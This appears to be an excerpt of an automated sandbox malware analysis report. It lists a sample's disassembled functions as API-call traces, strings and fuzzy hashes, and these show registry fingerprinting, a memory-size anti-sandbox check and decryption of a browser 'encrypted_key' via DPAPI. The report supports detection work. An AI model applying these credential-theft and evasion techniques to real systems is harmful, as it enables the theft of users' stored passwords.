Instruction Fuzzy Hash: 03317130941108BACB14FBF2DC56BEE7739AF18318F50452EF513A6092DFBC6985C66A

Function 00417E7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00417EC6
wsprintfA.USER32 ref: 00417EF9
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00417F1B
RegCloseKey.ADVAPI32(00000000), ref: 00417F2C
RegCloseKey.ADVAPI32(00000000), ref: 00417F39

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

RegQueryValueExA.KERNEL32(00000000,02739E48,00000000,000F003F,?,00000400), ref: 00417F8C
lstrlenA.KERNEL32(?), ref: 00417FA1
RegQueryValueExA.KERNEL32(00000000,02739DE8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B24), ref: 00418039
RegCloseKey.KERNEL32(00000000), ref: 004180A8
RegCloseKey.ADVAPI32(00000000), ref: 004180BA

Strings

%s\%s, xrefs: 00417EED

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: bb939a279c982b77b4b4f8b88d469f26bcfd6aa4ddc14bf67da64128b047d95d
Instruction ID: 0d61fbe7999a289fff57b0559f919f0328d455d47faa6f76a7bc41a93025e826
Opcode Fuzzy Hash: bb939a279c982b77b4b4f8b88d469f26bcfd6aa4ddc14bf67da64128b047d95d
Instruction Fuzzy Hash: 2B211971A0021CABDB24DF54DC85FD9B7B9FB48714F00C199A609A6280DF756AC6CF98

Function 00404800 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 0040483A
??_U@YAPAXI@Z.MSVCRT ref: 00404851
??2@YAPAXI@Z.MSVCRT ref: 00404868
lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

Strings

<, xrefs: 00404819

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ??2@CrackInternetlstrlen
String ID: <
API String ID: 184842949-4251816714
Opcode ID: 59693407489f90c3cdb96c3bdf34aef2329dc52aa92972b47e71a7c994f894f8
Instruction ID: 93cf72731df314aae8b190796811ac6c8ed605cccc68025416595ba5c6ffb16c
Opcode Fuzzy Hash: 59693407489f90c3cdb96c3bdf34aef2329dc52aa92972b47e71a7c994f894f8
Instruction Fuzzy Hash: 0A2129B1D00208ABDF14DFA5E849ADD7B75FF44364F108229F926A72D0DB706A05CF95

Function 00417130 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417144
HeapAlloc.KERNEL32(00000000), ref: 0041714B
RegOpenKeyExA.KERNEL32(80000002,027197A0,00000000,00020119,00000000), ref: 0041717D
RegQueryValueExA.KERNEL32(00000000,02739EF0,00000000,00000000,?,000000FF), ref: 0041719E
RegCloseKey.ADVAPI32(00000000), ref: 004171A8

Strings

Windows 11, xrefs: 0041715D

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3466090806-2517555085
Opcode ID: 7e52da74aeff6e087cb32fc56a687b6502875dfd8540e0d42b3236aa97f07f61
Instruction ID: 198b37f2a351322ee600fb862932720b373255b2f394089b4190a5419862cb8c
Opcode Fuzzy Hash: 7e52da74aeff6e087cb32fc56a687b6502875dfd8540e0d42b3236aa97f07f61
Instruction Fuzzy Hash: 4C018F74A40208BFEB10DFE4DD49FAE7779EB08710F104098FA0997290D6749A428B64

Function 004171C0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 004171D4
HeapAlloc.KERNEL32(00000000), ref: 004171DB
RegOpenKeyExA.KERNEL32(80000002,027197A0,00000000,00020119,00417159), ref: 004171FB
RegQueryValueExA.KERNEL32(00417159,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041721A
RegCloseKey.ADVAPI32(00417159), ref: 00417224

Strings

CurrentBuildNumber, xrefs: 00417211

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3466090806-1022791448
Opcode ID: 6c07f27ec60b8ac9df4e5178828e9d35e6ab3eda5138c8e540781496da3810dc
Instruction ID: 00cad297c96af00baba5933f046dbcc6cd847f8af16dedc1aa1025fe7f1f3d79
Opcode Fuzzy Hash: 6c07f27ec60b8ac9df4e5178828e9d35e6ab3eda5138c8e540781496da3810dc
Instruction Fuzzy Hash: EE014FB9A40708BFDB10DFE0DC4AFAEB779EB08704F104558FA05A7291D674AA418B55

Function 00413BC0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00413BE5
RegOpenKeyExA.KERNEL32(80000001,0273A5E0,00000000,00020119,?), ref: 00413C04
RegQueryValueExA.ADVAPI32(?,0273AC40,00000000,00000000,00000000,000000FF), ref: 00413C28
RegCloseKey.ADVAPI32(?), ref: 00413C32
lstrcat.KERNEL32(?,00000000), ref: 00413C57
lstrcat.KERNEL32(?,0273AC70), ref: 00413C6B

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: d4db36429f90b718e22daca015467a858ebeea603ee9fe30967bea3d45dd3f7a
Instruction ID: 29de2a712fc1e2dfcbf32ad4341a25eb625067ccdef54b7492a2b75d077fe01c
Opcode Fuzzy Hash: d4db36429f90b718e22daca015467a858ebeea603ee9fe30967bea3d45dd3f7a
Instruction Fuzzy Hash: 1841B8B69001086BDB24EBA0DC46FEE733DAB88304F00895DB619561D1FEB957CC8BD5

Function 00413070 Relevance: 9.1, APIs: 6, Instructions: 122stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00413098

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

strtok_s.MSVCRT ref: 004131E1

Part of subcall function 0041A1F0: lstrlenA.KERNEL32(00000000,?,?,00415634,00420AC3,00420AC2,?,?,004165B6,00000000,?,02716658,?,004210DC,?,00000000), ref: 0041A1FB
Part of subcall function 0041A1F0: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A255

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpystrtok_s$lstrlen
String ID:
API String ID: 3184129880-0
Opcode ID: 0fde3d401e6a36b581a0d6eb60101e268455dd58f6f525be26f0175b483d2959
Instruction ID: 79a306a9ddce9c6cdb539d8aaa48a82ffdeeeca754e5da37ea89086183b8fd1c
Opcode Fuzzy Hash: 0fde3d401e6a36b581a0d6eb60101e268455dd58f6f525be26f0175b483d2959
Instruction Fuzzy Hash: 87416371E01108ABCB04EFE5DC89AEEB774BF44314F00801EE51677251DB78AA95CF9A

Function 00409A10 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409A3C
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A61
LocalAlloc.KERNEL32(00000040,?), ref: 00409A81
ReadFile.KERNEL32(000000FF,?,00000000,00410127,00000000), ref: 00409AAA
LocalFree.KERNEL32(00410127), ref: 00409AE0
FindCloseChangeNotification.KERNEL32(000000FF), ref: 00409AEA

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
String ID:
API String ID: 1815715184-0
Opcode ID: 05ed42e63fd74b815e84f1989cd72ce9f9ee0e1b6034f55d12926f8b286bbe54
Instruction ID: 9a616c59c25f48dda5b41b64f2eda75996ce8e2783f016847e561ac14b63f668
Opcode Fuzzy Hash: 05ed42e63fd74b815e84f1989cd72ce9f9ee0e1b6034f55d12926f8b286bbe54
Instruction Fuzzy Hash: 5D310AB4A00209EFDB24CF95C895BAE7BB5BF48314F108169E911A73D0D778AD41CFA5

Function 00414260 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,02739980), ref: 004142BB

Part of subcall function 00418880: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 004188AB

lstrcat.KERNEL32(?,00000000), ref: 004142E1
lstrcat.KERNEL32(?,?), ref: 00414300
lstrcat.KERNEL32(?,?), ref: 00414314
lstrcat.KERNEL32(?,02719000), ref: 00414327
lstrcat.KERNEL32(?,?), ref: 0041433B
lstrcat.KERNEL32(?,0273A4C0), ref: 0041434F

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 00418830: GetFileAttributesA.KERNEL32(00000000,?,0040FF57,?,00000000,?,00000000,00420D97,00420D96), ref: 0041883F

Part of subcall function 00414050: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414060
Part of subcall function 00414050: HeapAlloc.KERNEL32(00000000), ref: 00414067
Part of subcall function 00414050: wsprintfA.USER32 ref: 00414086
Part of subcall function 00414050: FindFirstFileA.KERNEL32(?,?), ref: 0041409D

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 167551676-0
Opcode ID: dcb64fc2a139841cd2b9e474ea0c64847747aa9f2a659b48b44303e3aaff7578
Instruction ID: 4fb66fc9f0e99d4a69d4435a00fe4e0f35192ff1271240cc59f29c1c24f4a50f
Opcode Fuzzy Hash: dcb64fc2a139841cd2b9e474ea0c64847747aa9f2a659b48b44303e3aaff7578
Instruction Fuzzy Hash: 663188B290021CA7CB24FBA0DC85EDD773DAB58708F40459EB60596091EE7897C9CFA8

Function 00401220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
__aulldiv.LIBCMT ref: 00401258
__aulldiv.LIBCMT ref: 00401266
ExitProcess.KERNEL32 ref: 00401294

Strings

@, xrefs: 00401233

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: ea570c17900da72c0ff61e466dfdba6c639ea0a5e55046902d87947f1e012f1f
Instruction ID: 3a295e2926d3a661784167dae5cc93d3585e5da9a2cb48fc087cd8b2851d2611
Opcode Fuzzy Hash: ea570c17900da72c0ff61e466dfdba6c639ea0a5e55046902d87947f1e012f1f
Instruction Fuzzy Hash: 8601FBB0D40308BAEB10EBE4DD49B9EBB78AB14705F20809EEA05B62D0D7785585875D

Function 00409D30 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 00409A10: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409A3C
Part of subcall function 00409A10: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A61
Part of subcall function 00409A10: LocalAlloc.KERNEL32(00000040,?), ref: 00409A81
Part of subcall function 00409A10: ReadFile.KERNEL32(000000FF,?,00000000,00410127,00000000), ref: 00409AAA
Part of subcall function 00409A10: LocalFree.KERNEL32(00410127), ref: 00409AE0
Part of subcall function 00409A10: FindCloseChangeNotification.KERNEL32(000000FF), ref: 00409AEA

Part of subcall function 004188D0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004188F2

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D89

Part of subcall function 00409B10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 00409B3F
Part of subcall function 00409B10: LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 00409B51
Part of subcall function 00409B10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 00409B7A
Part of subcall function 00409B10: LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 00409B8F

memcmp.MSVCRT ref: 00409DE2

Part of subcall function 00409BB0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409BD4
Part of subcall function 00409BB0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BF3
Part of subcall function 00409BB0: memcpy.MSVCRT ref: 00409C16
Part of subcall function 00409BB0: LocalFree.KERNEL32(?), ref: 00409C23

Strings

"encrypted_key":", xrefs: 00409D80
, xrefs: 00409E11
DPAPI, xrefs: 00409DD9

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$ChangeCloseCreateDataFindNotificationReadSizeUnprotectlstrcpymemcmpmemcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 596995583-738592651
Opcode ID: 1b3b2d2c445c70206a6622af5ace0cc58a721cd3e0b5ddc67bd7cf7d43f6fa64
Instruction ID: 7f392d33d6ad21de2d61bb21213a98381b23072c845d074b64d64ac31095145a
Opcode Fuzzy Hash: 1b3b2d2c445c70206a6622af5ace0cc58a721cd3e0b5ddc67bd7cf7d43f6fa64
Instruction Fuzzy Hash: 7A3150B5D00108ABCB04DBE4DC45AEF77B8AF48304F44856AE915B3282E7789E44CBA5

Function 6C59C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6C59C947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C59C969
GetSystemInfo.KERNEL32(?), ref: 6C59C9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C59C9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C59C9E2

Memory Dump Source

Source File: 00000000.00000002.2467880515.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.2467837720.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2467980836.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2468031294.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2468067392.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

